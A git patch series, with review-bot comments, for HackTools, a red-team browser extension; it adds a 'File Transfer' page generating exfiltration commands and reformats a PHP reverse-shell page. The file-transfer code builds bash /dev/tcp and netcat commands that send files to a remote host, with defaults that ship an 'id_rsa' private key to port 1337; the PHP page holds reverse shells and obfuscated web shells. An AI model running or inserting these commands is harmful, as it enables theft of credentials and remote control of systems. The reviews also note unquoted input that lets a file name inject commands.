From 6cf7826bc707701d4d60abf4969393dacd3af557 Mon Sep 17 00:00:00 2001 From: Rb-x Date: Fri, 4 Sep 2020 23:09:30 +0200 Subject: [PATCH 1/2] =?UTF-8?q?adding=20few=20snippets=20of=20data-transfe?= =?UTF-8?q?r=20methods=20=F0=9F=93=A4=F0=9F=93=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/components/LayoutApp.js | 33 ++- src/components/file_transfer/file_transfer.js | 254 ++++++++++++++++++ src/manifest.json | 4 +- yarn.lock | 27 -- 4 files changed, 279 insertions(+), 39 deletions(-) create mode 100644 src/components/file_transfer/file_transfer.js diff --git a/src/components/LayoutApp.js b/src/components/LayoutApp.js index f3e6c96..14f41a0 100644 --- a/src/components/LayoutApp.js +++ b/src/components/LayoutApp.js @@ -17,6 +17,7 @@ import SQLi from "./web/SqlInjection"; import AboutUs from "./AboutUs"; import FeedRSS from "./FeedRSS"; import SSTI from "./web/SSTI"; +import FileTransfer from "./file_transfer/File_transfer" const { Paragraph } = Typography; const { Sider, Content, Footer } = Layout; const IconFont = createFromIconfontCN({ @@ -96,6 +97,18 @@ export default (props) => { + } + onClick={() => goTo(FileTransfer)} + > + Transfer Methods + + { LFI { XSS { SQL Injection { Base64 Encoder / Decoder { Hashing { URL Encoder / Decoder { Hexadecimal Encoder / Decoder { SSTI { Feed RSS { Ludovic COULON - Riadh BOUCHAHOUA -
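Review bot: The import added in the first LayoutApp.js hunk, `import FileTransfer from "./file_transfer/File_transfer"`, does not match the case of the file this patch creates, `src/components/file_transfer/file_transfer.js`. On a case-sensitive file system the module will not resolve, so a build that passes on macOS or Windows can fail on Linux. The specifier should be `"./file_transfer/file_transfer"`. The second patch in this series (the `@@ -17,236 +17,236 @@` LayoutApp.js hunk) only adds the semicolon and keeps the capital F.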
HackTools Version - 0.1.4
+
HackTools Version - 0.2.0
diff --git a/src/components/file_transfer/file_transfer.js b/src/components/file_transfer/file_transfer.js
new file mode 100644
index 0000000..28dd8ff
--- /dev/null
+++ b/src/components/file_transfer/file_transfer.js
@@ -0,0 +1,254 @@ +import React, { useState } from "react"; +import { Button, message, Typography, Row, Col, Divider, Input } from "antd"; +import { + CopyOutlined, + WifiOutlined, + LinkOutlined, + createFromIconfontCN, +} from "@ant-design/icons"; +import QueueAnim from "rc-queue-anim"; +import Clipboard from "react-clipboard.js"; + +const { Title, Paragraph } = Typography; +const IconFont = createFromIconfontCN({ + scriptUrl: ["./iconfont.js"], +}); + +export default (props) => { + const [values, setValues] = useState({ + ip: "", + port: "", + file_name: "" + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const successInfoReverseShell = () => { + message.success("Your reverse shell has been copied"); + }; + const successInfoEncodeURL = () => { + message.success("Reverse shell URI encoded has been copied"); + }; + const bash_transfer = ` + bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${values.file_name})" > /dev/tcp/${values.ip}/${values.port}' + `; + const bash_tcp_transfer = ` + bash -c 'cat ${values.file_name} > /dev/tcp/${values.ip}/${values.port}' + ` + + + const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'` + const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; + const python_server = `python3 -m http.server ${values.port}`; + const python2_server = `python -m SimpleHTTPServer ${values.port}` + const scp = `scp ${values.file_name} username@${values.ip || "IP"}:~/destination ${values.port && "-P " + values.port}` + const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${values.port && "-P " + values.port}` + return ( + + + File Transfer + + + Various method of data exfiltration and download from a remote machine. + +
+ + + } + name='Ip adress' + placeholder='IP Address or Host (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + + } + name='File name' + placeholder='Filename (ex: script.sh)' + onChange={handleChange("file_name")} + /> + + +
+ +
+ + Bash Upload <IconFont type='icon-gnubash' /> + + + + + + # Upload file over HTTP (require HTTP service running on the attacker machine) + + + {bash_transfer} + + + + # Exfiltrate file over TCP + + + # listen with Netcat on port ${values.port} + output redirection + + + + + + nc -l -p ${values.port} {">"} data + + + + {bash_tcp_transfer} + + + + Bash Download <IconFont type='icon-gnubash' /> + + + + + + # send via netcat + + + nc -l -p {values.port} {"<"} {values.file_name} + + + # Download file on the other machine + + + + {bash_download} + +
+ +
+ + Netcat <IconFont type='icon-command-line' /> + + + + + # Upload + + + nc -l -p ${values.port} + + + nc ${values.ip} ${values.port} {"<"} ${values.file_name} + + + + {netcat_transfer} + + + + + # Download + + + nc {values.ip} {values.port} {"<"} {values.file_name} + + + nc -l -p {values.port} {">"} file_saved + + + + +
+ + +
+ + Python <IconFont type='icon-python' /> + + + + # Python3 HTTP Server + + + + {python_server} + + + + # Python2 HTTP Server + + + {python2_server} + + + + + wget http://{values.ip || "IP"}:{values.port || "port"}/{values.FILE || "filename"} + + + + +
+ + +
+ + SCP <IconFont type='icon-python' /> + + + + # Upload from local to remote + + + {scp} + + + # download from remote + + + {scp_dl} + + + + + + +
+ + + + + + + + + + +
+ ); +}; diff --git a/src/manifest.json b/src/manifest.json index 8d7a9ec..2ee34a3 100644 --- a/src/manifest.json +++ b/src/manifest.json @@ -1,6 +1,6 @@ { "name": "Hack Tools", - "version": "0.1.4", + "version": "0.2.0", "description": "The all in one Red team extension for web pentester", "browser_action": { "default_title": "Hack Tools", @@ -20,4 +20,4 @@ }, "manifest_version": 2, "devtools_page": "devtools.html" -} +} \ No newline at end of file diff --git a/yarn.lock b/yarn.lock index e8ed409..b9e0fc1 100644 --- a/yarn.lock +++ b/yarn.lock @@ -1135,13 +1135,6 @@ dependencies: regenerator-runtime "^0.13.4" -"@babel/runtime@^7.10.5": - version "7.11.2" - resolved "https://registry.yarnpkg.com/@babel/runtime/-/runtime-7.11.2.tgz#f549c13c754cc40b87644b9fa9f09a6a95fe0736" - integrity sha512-TeWkU52so0mPtDcaCTxNBI/IHiz0pZgr8VEFqXFtZWpYD08ZB6FaSwVAS8MKRQAP3bYKiVjwysOJgMFY28o6Tw== - dependencies: - regenerator-runtime "^0.13.4" - "@babel/template@^7.10.1", "@babel/template@^7.10.3", "@babel/template@^7.4.0", "@babel/template@^7.8.6": version "7.10.3" resolved "https://registry.yarnpkg.com/@babel/template/-/template-7.10.3.tgz#4d13bc8e30bf95b0ce9d175d30306f42a2c9a7b8" @@ -6972,14 +6965,6 @@ map-visit@^1.0.0: dependencies: object-visit "^1.0.0" -match-sorter@^4.1.0: - version "4.2.0" - resolved "https://registry.yarnpkg.com/match-sorter/-/match-sorter-4.2.0.tgz#70c4e7443dacf5fa2503bc5afc189024092e9d27" - integrity sha512-oEvLn8R+a30YZ9l5XdCTkYQuLsOs8frxEqQTAuxoqkQx/qV5pQpx/NqAWvJ5xbYecqfXoF/ZevaIS1+NkbRymg== - dependencies: - "@babel/runtime" "^7.10.5" - remove-accents "0.4.2" - md5.js@^1.3.4: version "1.3.5" resolved "https://registry.yarnpkg.com/md5.js/-/md5.js-1.3.5.tgz#b5d07b8e3216e3e27cd728d72f70d1e6a342005f" 
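Review bot: `ip`, `port` and `file_name` go from the inputs into the command templates (`bash_transfer`, `bash_tcp_transfer`, `bash_download`, `netcat_transfer`, `scp`, `scp_dl`) with no validation or quoting, so a file name containing a space, a quote or `;` yields a command that does something other than what the page suggests once it is pasted into a terminal. I would check `port` against `/^\d{1,5}$/` before use and show the file name shell-quoted, or reject names with characters outside a safe set, rather than interpolating it raw. Separately, the wget line in the Python section reads `values.FILE`, which is never set in state, so it always shows "filename"; it should be `{values.file_name || "filename"}`. The same templates are carried unchanged into the `@@ -1,254 +1,180 @@` hunk of the second patch.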
@@ -9276,13 +9261,6 @@ react-lifecycles-compat@^3.0.4: resolved "https://registry.yarnpkg.com/react-lifecycles-compat/-/react-lifecycles-compat-3.0.4.tgz#4f1a273afdfc8f3488a8c516bfda78f872352362" integrity sha512-fBASbA6LnOU9dOU2eW7aQ8xmYBSXUIWr+UmF9b1efZBazGNO+rcXT/icdKnYm2pTwcRylVUYwW7H1PHfLekVzA== -react-query-devtools@^2.4.4: - version "2.4.4" - resolved "https://registry.yarnpkg.com/react-query-devtools/-/react-query-devtools-2.4.4.tgz#b179e5f5a0fd17027a66c59f782d051577eb79fb" - integrity sha512-ojVrdGZHuY4CXZzj4Q4VgT20fJB70quGwCONpNkLPG2s7C8u/7e6ZJQjoSySZ3WFydgvJqKxcHmIZuPGHqP6Vw== - dependencies: - match-sorter "^4.1.0" - react-query@^2.5.13: version "2.5.13" resolved "https://registry.yarnpkg.com/react-query/-/react-query-2.5.13.tgz#0948e044416562c4c58c966c27387ce4037bbf5a" @@ -9525,11 +9503,6 @@ relateurl@0.2.x: resolved "https://registry.yarnpkg.com/relateurl/-/relateurl-0.2.7.tgz#54dbf377e51440aca90a4cd274600d3ff2d888a9" integrity sha1-VNvzd+UUQKypCkzSdGANP/LYiKk= -remove-accents@0.4.2: - version "0.4.2" - resolved "https://registry.yarnpkg.com/remove-accents/-/remove-accents-0.4.2.tgz#0a43d3aaae1e80db919e07ae254b285d9e1c7bb5" - integrity sha1-CkPTqq4egNuRngeuJUsoXZ4ce7U= - remove-trailing-separator@^1.0.1: version "1.1.0" resolved "https://registry.yarnpkg.com/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz#c24bce2a283adad5bc3f58e0d48249b92379d8ef" From 7820392922c865ee1899b2aba211e81c8cd6c563 Mon Sep 17 00:00:00 2001 From: LasCC Date: Sat, 5 Sep 2020 00:09:21 +0200 Subject: [PATCH 2/2] =?UTF-8?q?Update=20File=20Transfer=20=F0=9F=A5=B3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 7 +- src/assets/img/icons/iconfont.js | 2 +- src/components/LayoutApp.js | 456 +++++----- src/components/PhpReverseShell.js | 818 +++++++++--------- src/components/file_transfer/file_transfer.js | 408 ++++----- 5 files changed, 810 insertions(+), 881 deletions(-) 
diff --git a/README.md b/README.md index f857e80..b5c0ee7 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ logo_hack_tools

Welcome to HackTools 🛠

- Version + Version release mozilla @@ -39,6 +39,9 @@ With the extension you **no longer need to search for payloads in different webs - Base64 Encoder / Decoder - Hash Generator (MD5, SHA1, SHA256, SHA512) - Useful Linux commands (Port Forwarding, SUID) +- RSS Feed (Exploit DB and Cisco Security Advisories) +- CVE Search Engine +- Various method of data exfiltration and download from a remote machine ## Preview @@ -58,7 +61,7 @@ With the extension you **no longer need to search for payloads in different webs preview_4 -# Install the application +# Install the extension ## Chromium based browser diff --git a/src/assets/img/icons/iconfont.js b/src/assets/img/icons/iconfont.js index d3e880e..9988e9f 100644 --- a/src/assets/img/icons/iconfont.js +++ b/src/assets/img/icons/iconfont.js 
@@ -1 +1 @@ -!function(t){var c,l,h,a,o,e,i,s='',v=(c=document.getElementsByTagName("script"))[c.length-1].getAttribute("data-injectcss");if(v&&!t.__iconfont__svg__cssinject__){t.__iconfont__svg__cssinject__=!0;try{document.write("")}catch(t){console&&console.log(t)}}function m(){e||(e=!0,a())}l=function(){var t,c,l,h,a,o=document.createElement("div");o.innerHTML=s,s=null,(t=o.getElementsByTagName("svg")[0])&&(t.setAttribute("aria-hidden","true"),t.style.position="absolute",t.style.width=0,t.style.height=0,t.style.overflow="hidden",c=t,(l=document.body).firstChild?(h=c,(a=l.firstChild).parentNode.insertBefore(h,a)):l.appendChild(c))},document.addEventListener?~["complete","loaded","interactive"].indexOf(document.readyState)?setTimeout(l,0):(h=function(){document.removeEventListener("DOMContentLoaded",h,!1),l()},document.addEventListener("DOMContentLoaded",h,!1)):document.attachEvent&&(a=l,o=t.document,e=!1,(i=function(){try{o.documentElement.doScroll("left")}catch(t){return void setTimeout(i,50)}m()})(),o.onreadystatechange=function(){"complete"==o.readyState&&(o.onreadystatechange=null,m())})}(window); \ No newline at end of file +!function(t){var c,l,h,a,o,i,e,s='',v=(c=document.getElementsByTagName("script"))[c.length-1].getAttribute("data-injectcss");if(v&&!t.__iconfont__svg__cssinject__){t.__iconfont__svg__cssinject__=!0;try{document.write("")}catch(t){console&&console.log(t)}}function m(){i||(i=!0,a())}l=function(){var 
t,c,l,h,a,o=document.createElement("div");o.innerHTML=s,s=null,(t=o.getElementsByTagName("svg")[0])&&(t.setAttribute("aria-hidden","true"),t.style.position="absolute",t.style.width=0,t.style.height=0,t.style.overflow="hidden",c=t,(l=document.body).firstChild?(h=c,(a=l.firstChild).parentNode.insertBefore(h,a)):l.appendChild(c))},document.addEventListener?~["complete","loaded","interactive"].indexOf(document.readyState)?setTimeout(l,0):(h=function(){document.removeEventListener("DOMContentLoaded",h,!1),l()},document.addEventListener("DOMContentLoaded",h,!1)):document.attachEvent&&(a=l,o=t.document,i=!1,(e=function(){try{o.documentElement.doScroll("left")}catch(t){return void setTimeout(e,50)}m()})(),o.onreadystatechange=function(){"complete"==o.readyState&&(o.onreadystatechange=null,m())})}(window); \ No newline at end of file diff --git a/src/components/LayoutApp.js b/src/components/LayoutApp.js index 14f41a0..dfaa6cb 100644 --- a/src/components/LayoutApp.js +++ b/src/components/LayoutApp.js @@ -1,7 +1,7 @@ import React from "react"; -import { Layout, Menu, Typography } from "antd"; +import { Layout, Menu, Typography, Badge } from "antd"; import { CopyrightCircleOutlined } from "@ant-design/icons"; -import { createFromIconfontCN, DatabaseOutlined } from "@ant-design/icons"; +import { createFromIconfontCN } from "@ant-design/icons"; import { goTo } from "react-chrome-extension-router"; import ReverseShell from "./ReverseShell"; import PhpReverseShell from "./PhpReverseShell"; 
@@ -17,236 +17,236 @@ import SQLi from "./web/SqlInjection"; import AboutUs from "./AboutUs"; import FeedRSS from "./FeedRSS"; import SSTI from "./web/SSTI"; -import FileTransfer from "./file_transfer/File_transfer" +import FileTransfer from "./file_transfer/File_transfer"; const { Paragraph } = Typography; const { Sider, Content, Footer } = Layout; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - return ( - - -

- - - - - -
- - - } - onClick={() => goTo(ReverseShell)} - > - Reverse Shell - - - } - onClick={() => goTo(PhpReverseShell)} - > - PHP Reverse Shell - - - } - onClick={() => goTo(TtySpawnShell)} - > - TTY Spawn Shell - - - } - onClick={() => goTo(LinuxCommands)} - > - Useful Linux commands - - - } - onClick={() => goTo(FileTransfer)} - > - Transfer Methods - - - } - onClick={() => goTo(LFI)} - > - LFI - - - } - onClick={() => goTo(XSS)} - > - XSS - - - } - onClick={() => goTo(SQLi)} - > - SQL Injection - - - } - onClick={() => goTo(Base64Encode)} - > - Base64 Encoder / Decoder - - - } - onClick={() => goTo(Hashing)} - > - Hashing - - - } - onClick={() => goTo(URLDecode)} - > - URL Encoder / Decoder - - - } - onClick={() => goTo(HexEncode)} - > - Hexadecimal Encoder / Decoder - - - } - onClick={() => goTo(SSTI)} - > - SSTI - - - } - onClick={() => goTo(FeedRSS)} - > - Feed RSS - - - } - onClick={() => goTo(AboutUs)} - > - About us - - - - - -
- {props.children} -
-
-
- Hack Tools - The all in one Red team - browser extension for web pentesters - - Ludovic COULON - Riadh BOUCHAHOUA - -
HackTools Version - 0.2.0
-
-
- - ); + return ( + + +
+ + + + + +
+ + + } + onClick={() => goTo(ReverseShell)} + > + Reverse Shell + + + } + onClick={() => goTo(PhpReverseShell)} + > + PHP Reverse Shell + + + } + onClick={() => goTo(TtySpawnShell)} + > + TTY Spawn Shell + + + } + onClick={() => goTo(LinuxCommands)} + > + Useful Linux commands + + + } + onClick={() => goTo(FileTransfer)} + > + Transfer Methods + + + } + onClick={() => goTo(LFI)} + > + LFI + + + } + onClick={() => goTo(XSS)} + > + XSS + + + } + onClick={() => goTo(SQLi)} + > + SQL Injection + + + } + onClick={() => goTo(Base64Encode)} + > + Base64 Encoder / Decoder + + + } + onClick={() => goTo(Hashing)} + > + Hashing + + + } + onClick={() => goTo(URLDecode)} + > + URL Encoder / Decoder + + + } + onClick={() => goTo(HexEncode)} + > + Hexadecimal Encoder / Decoder + + + } + onClick={() => goTo(SSTI)} + > + SSTI + + + } + onClick={() => goTo(FeedRSS)} + > + Feed RSS + + + } + onClick={() => goTo(AboutUs)} + > + About us + + +
+ + +
+ {props.children} +
+
+
+ Hack Tools - The all in one Red team + browser extension for web pentesters + + Ludovic COULON - Riadh BOUCHAHOUA + +
HackTools Version - 0.2.0
+
+
+
+ ); }; diff --git a/src/components/PhpReverseShell.js b/src/components/PhpReverseShell.js index c2a4510..d040ea3 100644 --- a/src/components/PhpReverseShell.js +++ b/src/components/PhpReverseShell.js @@ -1,20 +1,20 @@ import React, { useState } from "react"; import { - Input, - Button, - message, - Typography, - Row, - Col, - Divider, - Collapse, + Input, + Button, + message, + Typography, + Row, + Col, + Divider, + Collapse, } from "antd"; import { - CopyOutlined, - WifiOutlined, - DownloadOutlined, - ArrowsAltOutlined, - createFromIconfontCN, + CopyOutlined, + WifiOutlined, + DownloadOutlined, + ArrowsAltOutlined, + createFromIconfontCN, } from "@ant-design/icons"; import QueueAnim from "rc-queue-anim"; import Clipboard from "react-clipboard.js"; 
@@ -22,29 +22,29 @@ import Clipboard from "react-clipboard.js"; const { Title, Paragraph } = Typography; const { Panel } = Collapse; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - const [values, setValues] = useState({ - ip: "", - port: "", - }); - const handleChange = (name) => (event) => { - setValues({ ...values, [name]: event.target.value }); - }; - const successInfoReverseShell = () => { - message.success("Your reverse shell has been copied"); - }; - const oneLiner = `"; - const shell_obfuscate_function = - `;").($_^"/"); ?>` + - ""; + const [values, setValues] = useState({ + ip: "", + port: "", + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const successInfoReverseShell = () => { + message.success("Your reverse shell has been copied"); + }; + const oneLiner = `"; + const shell_obfuscate_function = + `;").($_^"/"); ?>` + + ""; - const phpReverseShell = ` + const phpReverseShell = ` { ?> `; - return ( - - - PHP Reverse Shell - - - Attackers who successfully exploit a remote command execution - vulnerability can use a reverse shell to obtain an interactive shell - session on the target machine and continue their attack. - -
- - - } - name='Ip adress' - placeholder='IP Address (ex: 212.212.111.222)' - onChange={handleChange("ip")} - /> - - - } - name='Port' - placeholder='Port (ex: 1337)' - onChange={handleChange("port")} - /> - - -
- -
- Pentestmonkey's reverse shell - - This script will make an outbound TCP connection to a hardcoded IP and - port. - - - -

{phpReverseShell}

-
- - - - - - -
- -
- Basic RCE - - When you have successfully uploaded your payload, just put your - commands after the variable ?cmd= (ex: ?cmd=ls -la") - - {oneLiner} - - - - -
- -
- Web shell - - p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used - to quickly execute commands on a server when pentesting a PHP - application. - - - - pownyShell - - - - -
- -
- Obfuscate PHP Web Shell - {""} - - {" Usage : http://target.com/path/to/shell.php?0=command "} - - - "}> - - -
- -
- {""} - - { - ' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" ' - } - - - "}> - - -
- -
- {""} - Usage : - - http://target.com/path/to/shell.php?_=command - - - curl -X POST http://target.com/path/to/shell.php -d "_=command" ' - - - "} - > - - -
- -
- {shell_obfuscate} - Usage : - - http://target.com/path/to/shell.php?0=command - - - - -
- -
- {shell_obfuscate_function} - Usage : - - - http://target.com/path/to/shell.php?_=function&__=argument - - - - http://target.com/path/to/shell.php?_=system&__=ls - - - - - -
- - ); + return ( + + + PHP Reverse Shell + + + Attackers who successfully exploit a remote command execution + vulnerability can use a reverse shell to obtain an interactive shell + session on the target machine and continue their attack. + +
+ + + } + name='Ip adress' + placeholder='IP Address (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + +
+ +
+ Pentestmonkey's reverse shell + + This script will make an outbound TCP connection to a hardcoded IP and + port. + + + +

{phpReverseShell}

+ +
+
+ + + + +
+ +
+ Basic RCE + + When you have successfully uploaded your payload, just put your + commands after the variable ?cmd= (ex: ?cmd=ls -la") + + {oneLiner} + + + + +
+ +
+ Web shell + + p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used + to quickly execute commands on a server when pentesting a PHP + application. + + + + pownyShell + + + + +
+ +
+ Obfuscate PHP Web Shell + {""} + + {" Usage : http://target.com/path/to/shell.php?0=command "} + + + "}> + + +
+ +
+ {""} + + { + ' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" ' + } + + + "}> + + +
+ +
+ {""} + Usage : + - http://target.com/path/to/shell.php?_=command + + - curl -X POST http://target.com/path/to/shell.php -d "_=command" ' + + + "} + > + + +
+ +
+ {shell_obfuscate} + Usage : + - http://target.com/path/to/shell.php?0=command + + + + +
+ +
+ {shell_obfuscate_function} + Usage : + + - http://target.com/path/to/shell.php?_=function&__=argument + + + - http://target.com/path/to/shell.php?_=system&__=ls + + + + + +
+
+ ); }; diff --git a/src/components/file_transfer/file_transfer.js b/src/components/file_transfer/file_transfer.js index 28dd8ff..26f0273 100644 --- a/src/components/file_transfer/file_transfer.js +++ b/src/components/file_transfer/file_transfer.js 
@@ -1,254 +1,180 @@ import React, { useState } from "react"; -import { Button, message, Typography, Row, Col, Divider, Input } from "antd"; +import { Typography, Row, Col, Divider, Input } from "antd"; import { - CopyOutlined, - WifiOutlined, - LinkOutlined, - createFromIconfontCN, + WifiOutlined, + createFromIconfontCN, + FolderOutlined, } from "@ant-design/icons"; import QueueAnim from "rc-queue-anim"; -import Clipboard from "react-clipboard.js"; -const { Title, Paragraph } = Typography; +const { Title, Paragraph, Text } = Typography; const IconFont = createFromIconfontCN({ - scriptUrl: ["./iconfont.js"], + scriptUrl: ["./iconfont.js"], }); export default (props) => { - const [values, setValues] = useState({ - ip: "", - port: "", - file_name: "" - }); - const handleChange = (name) => (event) => { - setValues({ ...values, [name]: event.target.value }); - }; - const successInfoReverseShell = () => { - message.success("Your reverse shell has been copied"); - }; - const successInfoEncodeURL = () => { - message.success("Reverse shell URI encoded has been copied"); - }; - const bash_transfer = ` + const [values, setValues] = useState({ + ip: "10.10.164.167", + port: "1337", + file_name: "id_rsa", + }); + const handleChange = (name) => (event) => { + setValues({ ...values, [name]: event.target.value }); + }; + const bash_transfer = ` bash -c 'echo -e "POST / HTTP/0.9\n\n$(<${values.file_name})" > /dev/tcp/${values.ip}/${values.port}' `; - const bash_tcp_transfer = ` + const bash_tcp_transfer = ` bash -c 'cat ${values.file_name} > /dev/tcp/${values.ip}/${values.port}' - ` - - - const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'` - const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; - const python_server = `python3 -m http.server ${values.port}`; - const python2_server = `python -m SimpleHTTPServer ${values.port}` - const scp = `scp ${values.file_name} username@${values.ip || "IP"}:~/destination 
${values.port && "-P " + values.port}` - const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${values.port && "-P " + values.port}` - return ( - - - File Transfer - - - Various method of data exfiltration and download from a remote machine. - -
- - - } - name='Ip adress' - placeholder='IP Address or Host (ex: 212.212.111.222)' - onChange={handleChange("ip")} - /> - - - } - name='Port' - placeholder='Port (ex: 1337)' - onChange={handleChange("port")} - /> - - - } - name='File name' - placeholder='Filename (ex: script.sh)' - onChange={handleChange("file_name")} - /> - - -
- -
- - Bash Upload <IconFont type='icon-gnubash' /> - - - - - - # Upload file over HTTP (require HTTP service running on the attacker machine) - - - {bash_transfer} - - - - # Exfiltrate file over TCP - - - # listen with Netcat on port ${values.port} + output redirection - - - - - - nc -l -p ${values.port} {">"} data - - - - {bash_tcp_transfer} - - - - Bash Download <IconFont type='icon-gnubash' /> - - - - - - # send via netcat - - - nc -l -p {values.port} {"<"} {values.file_name} - - - # Download file on the other machine - - - - {bash_download} - -
- -
- - Netcat <IconFont type='icon-command-line' /> - - - - - # Upload - - - nc -l -p ${values.port} - - - nc ${values.ip} ${values.port} {"<"} ${values.file_name} - - - - {netcat_transfer} - - - - - # Download - - - nc {values.ip} {values.port} {"<"} {values.file_name} - - - nc -l -p {values.port} {">"} file_saved - - - - -
- - -
- - Python <IconFont type='icon-python' /> - - - - # Python3 HTTP Server - - - - {python_server} - - - - # Python2 HTTP Server - - - {python2_server} - - - - - wget http://{values.ip || "IP"}:{values.port || "port"}/{values.FILE || "filename"} - - - - -
- - -
- - SCP <IconFont type='icon-python' /> - - - - # Upload from local to remote - - - {scp} - - - # download from remote - - - {scp_dl} - - - - - - -
- - - - - - - - - - -
- ); + `; + const bash_download = `bash -c 'cat < /dev/tcp/${values.ip}/${values.port} > ${values.file_name}'`; + const netcat_transfer = `nc ${values.ip} ${values.port} < ${values.file_name}`; + const python_server = `python3 -m http.server ${values.port}`; + const python2_server = `python -m SimpleHTTPServer ${values.port}`; + const scp = `scp ${values.file_name} username@${ + values.ip || "IP" + }:~/destination ${values.port && "-P " + values.port}`; + const scp_dl = `scp user@${values.ip || "IP"}:~/path_to_file file_saved ${ + values.port && "-P " + values.port + }`; + + return ( + + + File Transfer + + + Various method of data exfiltration and download from a remote machine. + +
+ + + } + name='Ip adress' + placeholder='IP Address or Host (ex: 212.212.111.222)' + onChange={handleChange("ip")} + /> + + + } + name='Port' + placeholder='Port (ex: 1337)' + onChange={handleChange("port")} + /> + + + } + name='File name' + placeholder='Filename (ex: script.sh)' + onChange={handleChange("file_name")} + /> + + +
+ +
+ + Bash Upload <IconFont type='icon-gnubash' /> + + + # Upload file over HTTP (require HTTP service running on the attacker + machine) + + + {bash_transfer} + + + # Exfiltrate file over TCP + + + # Listen with Netcat on port {values.port} + output redirection + + + nc -l -p {values.port} {">"} data + + + {bash_tcp_transfer} + + + Bash Download <IconFont type='icon-gnubash' /> + + # Send via netcat + + nc -l -p {values.port} {"<"} {values.file_name} + + # Download file on the other machine + + {bash_download} + +
+ +
+ + Netcat <IconFont type='icon-command-line' /> + + # Upload payload + nc -lnvp {values.port} + + {netcat_transfer} + + + # Download + + + nc {values.ip} {values.port} {"<"} {values.file_name} + + + nc -lnvp {values.port} {">"} file_saved + +
+ +
+ + Python <IconFont type='icon-python' /> + + # Python3 HTTP Server + + {python_server} + + # Python2 HTTP Server + + {python2_server} + +
+ +
+ + SCP <IconFont type='icon-filelock' /> + + # Upload from local host to remote computer + + {scp} + + # Download from remote computer + + {scp_dl} + +
+
+ ); };
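Review bot: The new initial state (`ip: "10.10.164.167"`, `port: "1337"`, `file_name: "id_rsa"`) bakes one specific address and a private-key file name into every generated command, and it makes the `values.ip || "IP"` fallbacks in `scp` and `scp_dl` unreachable unless the user clears the field. If the inputs are not bound to this state (their props are not fully visible here), they will show only placeholders while the commands show these defaults. I would keep the state empty and fall back to neutral labels everywhere, e.g. `${values.file_name || "FILE"}`, so nothing runnable is shown until the user has typed their own values. Also, both scp templates append `-P port` after the operands, whereas scp documents options before the source and target, so `scp -P ${values.port} …` is the safer order.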